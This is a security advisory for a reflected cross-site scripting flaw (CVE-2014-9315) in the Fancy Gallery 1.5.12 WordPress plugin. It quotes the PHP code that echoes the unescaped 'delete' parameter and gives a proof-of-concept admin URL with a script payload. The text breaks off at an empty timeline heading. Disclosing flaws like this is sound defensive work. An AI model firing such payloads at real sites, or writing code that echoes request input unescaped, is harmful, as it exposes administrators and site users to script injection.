Fancy Gallery 1.5.12 Reflected XSS

Homepage:

https://wordpress.org/plugins/fancy-gallery/

CVE-ID

CVE-2014-9315

CVSS Score

4

CVSS Vector

(AV:N/AC:L/Au:S/C:P/I:N/A:N)

Description:

$_GET['delete'] is not escaped.

File: fancy-gallery\class.options.php

public function Load_Options_Page(){
	# Check if the user trys to delete a template
	If (IsSet($_GET['delete']) && $this->core->Get_Template_Properties ($_GET['delete'])){ # You can only delete Fancy Gallery Templates!
		Unlink($_GET['delete']);
		WP_Redirect( $this->Get_Options_Page_Url(Array('template_deleted' => 'true')) );
	}
	ElseIf (IsSet($_GET['delete'])){
		WP_Die($this->t('Error while deleting: ' . $_GET['delete']));
	}
}

private function t($text, $context = False){
	return $this->core->t($text, $context);
}

File: fancy-gallery\class.core.php

public function t($text, $content = False){
	return $this->i18n->t($text, $content);
}

File: fancy-gallery\class.i18n.php

public function t ($text, $context = Null){
	# Translates the string $text with context $context
	If (Empty($context))
		return Translate ($text, __CLASS__);
	Else
		return Translate_With_GetText_Context ($text, $context, __CLASS__);
}

Proof of Concept:

XSS will be visible for admin:

http://wordpress-url/wp-admin/options-general.php?page=WordPress/Plugin/Fancy_Gallery/Options&delete=<script>alert(String.fromCharCode(88,83,83,50));</script>

Timeline: